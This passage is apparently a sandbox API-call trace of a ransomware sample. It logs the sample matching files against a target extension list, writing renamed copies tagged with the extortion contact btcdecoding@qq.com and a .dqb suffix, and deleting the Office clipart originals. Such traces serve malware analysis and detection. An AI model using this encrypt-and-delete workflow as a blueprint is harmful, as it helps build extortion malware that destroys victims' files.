lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 63 [0058.029] lstrlenW (lpString=".zip") returned 4 [0058.029] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0058.029] lstrlenW (lpString=".rar") returned 4 [0058.029] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0058.029] lstrlenW (lpString=".bz2") returned 4 [0058.029] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0058.029] lstrlenW (lpString=".7z") returned 3 [0058.029] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0058.029] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 63 [0058.029] lstrlenW (lpString=".dbf") returned 4 [0058.029] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0058.029] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 63 [0058.029] lstrlenW (lpString=".1cd") returned 4 [0058.030] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0058.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 63 [0058.030] lstrlenW (lpString=".jpg") returned 4 [0058.030] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0058.030] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.030] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.030] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01636_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0058.030] GetLastError () returned 0x0 [0058.030] ReadFile (in: hFile=0x1fc, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x752, lpOverlapped=0x0) returned 1 [0058.032] WriteFile (in: hFile=0x180, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x760, lpOverlapped=0x0) returned 1 [0058.033] ReadFile (in: hFile=0x1fc, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0058.033] WriteFile (in: hFile=0x180, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0058.033] SetEndOfFile (hFile=0x180) returned 1 [0058.033] CloseHandle (hObject=0x180) returned 1 [0058.033] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.033] SetEndOfFile (hFile=0x1fc) returned 1 [0058.034] CloseHandle (hObject=0x1fc) returned 1 [0058.034] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0058.034] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01636_.wmf")) returned 1 [0058.035] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 63 [0058.035] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 63 [0058.035] lstrlenW (lpString=".doc") returned 4 [0058.035] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0058.035] lstrlenW (lpString=".docx") returned 5 [0058.035] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0058.035] lstrlenW (lpString=".pdf") returned 4 [0058.035] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0058.035] lstrlenW (lpString=".xls") returned 4 [0058.035] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0058.035] lstrlenW (lpString=".xlsx") returned 5 [0058.035] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0058.035] lstrlenW (lpString=".ppt") returned 4 [0058.035] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0058.035] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 63 [0058.035] lstrlenW (lpString=".zip") returned 4 [0058.035] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0058.035] lstrlenW (lpString=".rar") returned 4 [0058.035] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0058.035] lstrlenW (lpString=".bz2") returned 4 [0058.035] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0058.035] lstrlenW (lpString=".7z") returned 3 [0058.035] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0058.035] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 63 [0058.035] lstrlenW (lpString=".dbf") returned 4 [0058.035] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0058.035] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 63 [0058.035] lstrlenW (lpString=".1cd") returned 4 [0058.036] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0058.036] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 63 [0058.036] lstrlenW (lpString=".jpg") returned 4 [0058.036] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0058.036] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.036] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.036] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01637_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0058.036] GetLastError () returned 0x0 [0058.036] ReadFile (in: hFile=0x1fc, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0xf6c, lpOverlapped=0x0) returned 1 [0058.038] WriteFile (in: hFile=0x180, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xf70, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xf70, lpOverlapped=0x0) returned 1 [0058.039] ReadFile (in: hFile=0x1fc, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0058.039] WriteFile (in: hFile=0x180, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0058.039] SetEndOfFile (hFile=0x180) returned 1 [0058.039] CloseHandle (hObject=0x180) returned 1 [0058.039] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.039] SetEndOfFile (hFile=0x1fc) returned 1 [0058.040] CloseHandle (hObject=0x1fc) returned 1 [0058.040] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0058.040] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01637_.wmf")) returned 1 [0058.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 63 [0058.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 63 [0058.041] lstrlenW (lpString=".doc") returned 4 [0058.041] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0058.041] lstrlenW (lpString=".docx") returned 5 [0058.041] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0058.041] lstrlenW (lpString=".pdf") returned 4 [0058.041] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0058.041] lstrlenW (lpString=".xls") returned 4 [0058.041] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0058.041] lstrlenW (lpString=".xlsx") returned 5 [0058.041] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0058.041] lstrlenW (lpString=".ppt") returned 4 [0058.041] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0058.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 63 [0058.041] lstrlenW (lpString=".zip") returned 4 [0058.041] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0058.041] lstrlenW (lpString=".rar") returned 4 [0058.041] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0058.041] lstrlenW (lpString=".bz2") returned 4 [0058.041] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0058.041] lstrlenW (lpString=".7z") returned 3 [0058.041] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0058.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 63 [0058.041] lstrlenW (lpString=".dbf") returned 4 [0058.041] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0058.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 63 [0058.041] lstrlenW (lpString=".1cd") returned 4 [0058.041] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0058.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 63 [0058.042] lstrlenW (lpString=".jpg") returned 4 [0058.042] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0058.042] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.042] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.042] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01638_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0058.042] GetLastError () returned 0x0 [0058.042] ReadFile (in: hFile=0x1fc, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x292a, lpOverlapped=0x0) returned 1 [0058.044] WriteFile (in: hFile=0x180, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x2930, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x2930, lpOverlapped=0x0) returned 1 [0058.045] ReadFile (in: hFile=0x1fc, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0058.045] WriteFile (in: hFile=0x180, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0058.045] SetEndOfFile (hFile=0x180) returned 1 [0058.045] CloseHandle (hObject=0x180) returned 1 [0058.045] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.045] SetEndOfFile (hFile=0x1fc) returned 1 [0058.046] CloseHandle (hObject=0x1fc) returned 1 [0058.046] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0058.046] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01638_.wmf")) returned 1 [0058.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 63 [0058.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 63 [0058.047] lstrlenW (lpString=".doc") returned 4 [0058.047] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0058.047] lstrlenW (lpString=".docx") returned 5 [0058.047] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0058.047] lstrlenW (lpString=".pdf") returned 4 [0058.047] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0058.047] lstrlenW (lpString=".xls") returned 4 [0058.047] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0058.047] lstrlenW (lpString=".xlsx") returned 5 [0058.047] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0058.047] lstrlenW (lpString=".ppt") returned 4 [0058.047] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0058.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 63 [0058.047] lstrlenW (lpString=".zip") returned 4 [0058.047] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0058.047] lstrlenW (lpString=".rar") returned 4 [0058.047] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0058.047] lstrlenW (lpString=".bz2") returned 4 [0058.047] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0058.047] lstrlenW (lpString=".7z") returned 3 [0058.047] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0058.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 63 [0058.047] lstrlenW (lpString=".dbf") returned 4 [0058.047] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0058.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 63 [0058.047] lstrlenW (lpString=".1cd") returned 4 [0058.047] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0058.047] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 63 [0058.047] lstrlenW (lpString=".jpg") returned 4 [0058.047] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0058.048] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.048] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.048] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01639_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0058.048] GetLastError () returned 0x0 [0058.048] ReadFile (in: hFile=0x1fc, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x108c, lpOverlapped=0x0) returned 1 [0058.050] WriteFile (in: hFile=0x180, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x1090, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x1090, lpOverlapped=0x0) returned 1 [0058.050] ReadFile (in: hFile=0x1fc, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0058.050] WriteFile (in: hFile=0x180, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0058.051] SetEndOfFile (hFile=0x180) returned 1 [0058.051] CloseHandle (hObject=0x180) returned 1 [0058.051] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.051] SetEndOfFile (hFile=0x1fc) returned 1 [0058.052] CloseHandle (hObject=0x1fc) returned 1 [0058.052] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0058.052] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01639_.wmf")) returned 1 [0058.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 63 [0058.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 63 [0058.052] lstrlenW (lpString=".doc") returned 4 [0058.052] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0058.052] lstrlenW (lpString=".docx") returned 5 [0058.052] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0058.052] lstrlenW (lpString=".pdf") returned 4 [0058.052] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0058.052] lstrlenW (lpString=".xls") returned 4 [0058.052] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0058.052] lstrlenW (lpString=".xlsx") returned 5 [0058.052] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0058.052] lstrlenW (lpString=".ppt") returned 4 [0058.052] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0058.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 63 [0058.052] lstrlenW (lpString=".zip") returned 4 [0058.052] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0058.053] lstrlenW (lpString=".rar") returned 4 [0058.053] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0058.053] lstrlenW (lpString=".bz2") returned 4 [0058.053] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0058.053] lstrlenW (lpString=".7z") returned 3 [0058.053] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0058.053] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 63 [0058.053] lstrlenW (lpString=".dbf") returned 4 [0058.053] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0058.053] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 63 [0058.053] lstrlenW (lpString=".1cd") returned 4 [0058.053] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0058.053] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 63 [0058.053] lstrlenW (lpString=".jpg") returned 4 [0058.053] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0058.209] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.209] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.209] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cg1606.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0058.210] GetLastError () returned 0x0 [0058.210] ReadFile (in: hFile=0x204, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0xdec, lpOverlapped=0x0) returned 1 [0058.211] WriteFile (in: hFile=0x180, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xdf0, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xdf0, lpOverlapped=0x0) returned 1 [0058.212] ReadFile (in: hFile=0x204, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0058.212] WriteFile (in: hFile=0x180, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0058.212] SetEndOfFile (hFile=0x180) returned 1 [0058.213] CloseHandle (hObject=0x180) returned 1 [0058.213] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.213] SetEndOfFile (hFile=0x204) returned 1 [0058.213] CloseHandle (hObject=0x204) returned 1 [0058.213] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0058.214] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cg1606.wmf")) returned 1 [0058.214] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF") returned 61 [0058.214] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF") returned 61 [0058.214] lstrlenW (lpString=".doc") returned 4 [0058.214] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0058.214] lstrlenW (lpString=".docx") returned 5 [0058.214] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0058.214] lstrlenW (lpString=".pdf") returned 4 [0058.214] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0058.214] lstrlenW (lpString=".xls") returned 4 [0058.214] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0058.214] lstrlenW (lpString=".xlsx") returned 5 [0058.214] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0058.214] lstrlenW (lpString=".ppt") returned 4 [0058.214] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0058.214] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF") returned 61 [0058.214] lstrlenW (lpString=".zip") returned 4 [0058.214] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0058.214] lstrlenW (lpString=".rar") returned 4 [0058.214] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0058.214] lstrlenW (lpString=".bz2") returned 4 [0058.214] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0058.215] lstrlenW (lpString=".7z") returned 3 [0058.215] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0058.215] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF") returned 61 [0058.215] lstrlenW (lpString=".dbf") returned 4 [0058.215] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0058.215] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF") returned 61 [0058.215] lstrlenW (lpString=".1cd") returned 4 [0058.215] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0058.215] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF") returned 61 [0058.215] lstrlenW (lpString=".jpg") returned 4 [0058.215] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0058.217] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.217] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0058.217] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cup.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0058.218] GetLastError () returned 0x0 [0058.218] ReadFile (in: hFile=0x204, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0xb96, lpOverlapped=0x0) returned 1 [0058.219] WriteFile (in: hFile=0x180, lpBuffer=0x3540020*, 